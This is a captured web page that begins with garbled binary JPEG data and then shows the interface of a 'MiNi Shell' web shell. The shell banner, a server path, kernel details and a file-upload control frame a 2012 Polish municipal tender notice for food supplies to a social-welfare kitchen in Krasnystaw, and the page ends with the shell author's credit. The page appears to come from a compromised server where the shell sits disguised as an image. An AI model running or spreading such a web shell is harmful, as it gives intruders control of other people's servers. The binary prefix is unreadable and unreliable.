JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120517/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120517/160336-N-2012.html

<p class="kh_header"><b>Krasnystaw: Zakup i dostawa artykułów spożywczych dla kuchni
Miejskiego Ośrodka Pomocy Społecznej
w Krasnymstawie</b><br>
<b>Numer ogłoszenia: 160336 - 2012; data zamieszczenia: 17.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krasnymstawie , ul. Piłsudskiego 9, 22-300 Krasnystaw, woj. lubelskie, tel. 82 5762324, 5762281, 5766900, faks 82 576 23 24.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: GMINNA SAMORZĄDOWA JEDNOSTKA ORGANIZACYJNA.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa artykułów spożywczych dla kuchni
Miejskiego Ośrodka Pomocy Społecznej
w Krasnymstawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zakup i dostawa artykułów spożywczych dla kuchni Miejskiego Ośrodka Pomocy Społecznej w Krasnymstawie, zestawionych w 9 zadaniach (częściach) przedstawionych poniżej:
Zadanie Nr 1 - Gotowe, świeże produkty mączne CPV 15851000-8
Zadanie Nr 2 - Pieczywo świeże CPV 15810000-9
Zadanie Nr 3 - Mięso i wędliny CPV 15100000-9
Zadanie Nr 4 - Nabiał CPV 15512200-2
Zadanie Nr 5 - Artykuły mrożone CPV 15331170-9
Zadanie Nr 6 -Owoce i warzywa -świeże CPV 15300000-1
Zadanie Nr 7 - Artykuły spożywcze w opakowaniach zbiorczych- garmażeryjnych
                          CPV 15800000-6
Zadanie Nr 8 - Artykuły spożywcze drobne CPV 15800000-6
Zadanie Nr 9 - Wyroby ciastkarskie, ciasta CPV 15812000-3
, według wyszczegolnienia zawartego w Formularzu cenowym stanowiacym załącznik do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.85.10.00-8, 15.81.00.00-9, 15.10.00.00-9, 15.51.22.00-2, 15.33.11.70-9, 15.30.00.00-1, 15.80.00.00-6, 15.81.20.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższych warunków udziału w postępowaniu dokonana będzie przez Zamawiającego na podstawie  złożonych przez Wykonawców dokumentów  i oświadczeń stosując formułę spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższych warunków udziału w postępowaniu dokonana będzie przez Zamawiającego na podstawie  złożonych przez Wykonawców dokumentów  i oświadczeń stosując formułę spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższych warunków udziału w postępowaniu dokonana będzie przez Zamawiającego na podstawie  złożonych przez Wykonawców dokumentów  i oświadczeń stosując formułę spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższych warunków udziału w postępowaniu dokonana będzie przez Zamawiającego na podstawie  złożonych przez Wykonawców dokumentów  i oświadczeń stosując formułę spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższych warunków udziału w postępowaniu dokonana będzie przez Zamawiającego na podstawie  złożonych przez Wykonawców dokumentów  i oświadczeń stosując formułę spełnia-nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty ,Formularz cenowy, Podpisany wzór Umowy, Pełnomocnictwo osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio z załączonych dokumentów ( zgodnie z odpisem z właściwego rejestru). Załączone do oferty pełnomocnictwo winno być w formie oryginału lub kopii poświadczonej notarialnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość wprowadzania zmian w umowie w stosunku do treści oferty, które będą mogły być dokonane z powodu zaistnienia okoliczności niemożliwych do przewidzenia  w chwili zawarcia umowy lub w przypadku wystąpienia którejkolwiek z następujących sytuacji: przedłużenie lub skrócenie terminu zakończenia przedmiotu umowy może nastąpić w przypadkach: - wystąpienia okoliczności siły wyższej - jako siłę wyższą należy rozumieć zdarzenia niezależne od żadnej ze Stron, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiło po dniu wejścia w życie umowy; ustawowej zmiany stawki podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej
ul. Piłsudskiego 9
22-300 Krasnystaw
pok. 107.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.05.2012 godzina 09:00, miejsce: Miejski Ośrodek Pomocy Społecznej
ul. Piłsudskiego 9
22-300 Krasnystaw
pok. 107.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> NIE DOTYCZY.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Gotowe, świeże produkty mączne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Gotowe, świeże produkty mączne:Pierogi ruskie-świeże (nie mrożone)-120 kg; Pierogi z kaszą gryczaną, świeże (nie mrożone)-	75 kg; Pierogi z soczewicą - świeże (nie mrożone)-40 kg; Pierogi z kapustą- świeże (nie mrożone)-40 kg
Pierogi z kapustą i grzybami - świeże (nie mrożone)-40 kg; Pierogi z mięsem-świeże (nie mrożone)-40 kg; Kopytka- świeże (nie mrożone)-80 kg; Kluski śląskie- świeże (nie mrożone)-40 kg; Kluski leniwe- świeże (nie mrożone)-40 kg; Uszka z kapustą i grzybami - świeże (nie mrożone)-15 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.10.00-8, 15.85.12.20-6, 15.31.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pieczywo świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pieczywo świeże: Chleb zwykły 900g - krojony-1850 szt.
Chleb razowy 600g -krojony-450 szt.
Pączek z dżemem w pudrze-250 szt.
Drożdżówka z serem  100g-250 szt.
Drożdżówka z makiem  100g-250 szt.
Drożdżówka z jagodą  100g-250 szt.
Bułka 100g-700 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9, 15.81.11.00-7, 15.81.21.00-4, 15.61.25.00-6, 15.81.14.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mięso i wędliny: Żeberka	120 kg
Mięso gulaszowe	190kg
Kości pokrzepowe	600 kg
Kiełbasa krakowska	20 kg
Kiełbasa zwyczajna	80 kg
Karczek wieprzowy b/k	120 kg
Schab b/k	160 kg
Słonina	20 kg
Boczek surowy	30 kg
Boczek wędzony	30 kg
Kaszanka	75 kg
Tuszonka 	40 kg
Mięso mielone wieprzowe świeże nie paczkowane (bez dodatków ulepszaczy)	400 kg
Wątroba wieprzowa	30 kg
Polędwica sopocka krojona	3 kg
Szynka gotowana krojona	3 kg
Szynka pieczona krojona	3 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.13.14.00-9, 15.13.11.30-5, 15.13.11.34-3, 15.13.11.20-2, 15.13.11.30-5, 15.13.14.10-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nabiał: 
Śmietana 18% - 400ml lub 500 ml	500 l
Masło Extra- 200g 	45 kg
Mleko 2% butelka lub folia - 1l 	150 l
Twaróg kostka półtłusty 250g 	55 kg
Serek homogenizowany 125g	250 szt.
Serek owocowy 150g	250 szt.
Ser żółty twardy 40%	20 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.22.00-2, 15.53.00.00-2, 15.51.14.00-7, 15.54.21.00-0, 15.88.10.00-7, 15.54.40.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Artykuły mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Artykuły mrożone: 
Ćwiartka z kurczaka- mrożona	180 kg
Filet z kurczaka- mrożony	100 kg
Filet z dorsza- mrożony	200 kg
Flaki wołowe suche krojone 1 kg- mrożone	60 kg
Brokuł 2,5 kg- mrożony	35 kg
Fasola szparagowa 2,5 kg- mrożona	130 kg
Kurczak- mrożony	80 kg
Kalafior 2,5 kg- mrożona	80 kg
Marchew kostka 2,5 kg- mrożona	20 kg
Marchew z groszkiem 2,5 kg- mrożona	120 kg
Mieszanka kompotowa 2,5 kg- mrożona	40 kg
Porcja rosołowa - mrożona	40 kg
Placki ziemniaczane 1,5kg - mrożone	80 kg
Płat śledziowy po wiejsku wiadro 2,5 kg	80 kg
Truskawka 2,5 kg- mrożona	70 kg
Pyzy z mięsem mrożone	60 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.11.20.00-6, 15.22.90.00-6, 15.13.16.40-3, 15.33.21.00-5, 15.31.00.00-4, 15.24.12.00-1, 15.31.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Owoce i warzywa - świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Owoce i warzywa - świeże :
Banan	60 kg
Burak czerwony	195 kg
Cebula	150 kg
Czosnek- główka	5 szt.
Fasola drobna	40 kg
Fasola Jaś	30 kg
Jabłka	50 kg
Kapusta biała	400 kg
Kapusta czerwona	70 kg
Kapusta pekińska	90 kg
Kapusta kiszona	400 kg
Koperek zielony pęczek	60 szt.
Natka z pietruszki pęczek	60 szt.
Ogórek zielony	30 kg
Ogórek kiszony	80 kg
Papryka świeża	40 kg
Pomidor	60 kg
Por	35 kg
Pomarańcza	50 kg
Botwinka- pęczek	50 szt.
Rzodkiewka pęczek	50 szt.
Sałata zielona	30 szt.
Szczypiorek pęczek	25 szt.
Szczaw	50 kg
Pieczarka	140kg
Truskawka świeża	15 kg
Seler	120 kg
Marchew	350 kg
Ziemniaki	3000 kg
Ziemniak młody	2000 kg
Mandarynka	25 kg
Cytryna	5 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 03.22.21.11-4, 03.22.11.11-7, 03.22.11.13-1, 03.22.11.00-7, 03.22.12.20-4, 03.22.12.10-1, 03.22.23.21-9, 03.22.14.10-3, 15.33.11.42-4, 03.22.12.70-9, 03.22.12.40-0, 03.22.22.20-5, 03.22.11.00-6, 03.22.13.10-2, 03.22.11.00-6, 03.22.23.13-0, 03.22.11.12-4, 03.21.21.00-1, 03.22.22.20-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Artykuły spożywcze w opakowaniach zbiorczych - garmażeryjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Artykuły spożywcze w opakowaniach zbiorczych - garmażeryjnych:
Smalec 200g kostka	500 szt.	
Bułka tarta 0,5 kg	250 szt.	
Cukier kryształ 1kg	460 kg	
Cukier waniliowy 32g 	30 szt.	
Chrzan 300g	10 szt.	
Groch łupany 0,5kg 	76 szt.	
Jaja kurze	1500 szt.	
Kawa inka 150g	15 szt.	
Kasza jęczmienna 1kg 	100 kg	
Kasza gryczana 1kg 	100 kg	
Kukurydza konserwowa puszka 425ml 	15 szt.	
Kwasek cytrynowy 20g 	150 szt.	
Liść laurowy 6g 	70 szt.	
Koncentrat pomidorowy 30% 200g 	40 szt.	
Majonez 600ml lub 700ml	20 szt.	
Przyprawa do flaków 20g	5 szt.	
Ogórek konserwowy 0,9 l słoik	100 szt.	
Mąka pszenna 1kg typ500 	360 kg	
Mąka ziemniaczana 0,5kg 	10 szt.	
Musztarda 200g	10 szt.	
Olej 1l uniwersalny	160 szt.	
Pieprz czarny mielony 15g 	90 szt.	
Pieprz ziołowy 30g 	60 szt.	
Sól kuchenna 1kg	200 kg	
Majeranek 16 g	60 szt.	
Sok syrop 500ml 	120 szt. 	
Przyprawa warzywna do potraw Vegeta 200g lub
 równoważna	364 szt.	
Ziele angielskie 15g 	50 szt.	
Grzyby suszone 20g	80 szt.	
Kawa naturalna 250g	9 szt.	
Kawa rozpuszczalna 200g	8 szt.	
Śmietanka do kawy 10 x 10g	5 szt.	
Herbata expresowa A100 po 2g	5 szt.	
Woda mineralna gazowana 1,5l	48 szt.	
Woda mineralna niegazowana 1,5l	48 szt.
Sok 100% naturalny 2l	66 szt.
Paluszki solone od 200 g do300g	20 szt.
Paluszki z sezamem od 200 g do300g	10 szt.
Cukierki czekoladowe mieszanka luz	3 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.41.21.00-0, 15.81.10.00-6, 15.83.12.00-4, 15.83.00.00-5, 15.87.22.00-3, 03.21.22.00-2, 03.14.25.00-3, 15.86.12.00-3, 03.21.19.00-2, 15.33.14.70-2, 15.87.00.00-7, 15.33.14.27-6, 15.87.12.73-8, 03.22.12.70-9, 15.61.21.00-2, 15.61.20.00-1, 15.87.12.50-1, 15.41.11.00-3, 15.87.21.00-2, 15.87.24.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Wyroby ciastkarskie, ciasta.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wyroby ciastkarskie, ciasta: 
Ciastka drobne luz	20 kg
Ciasto pieczone (blacha)	45 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.20.00-3, 15.81.20.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com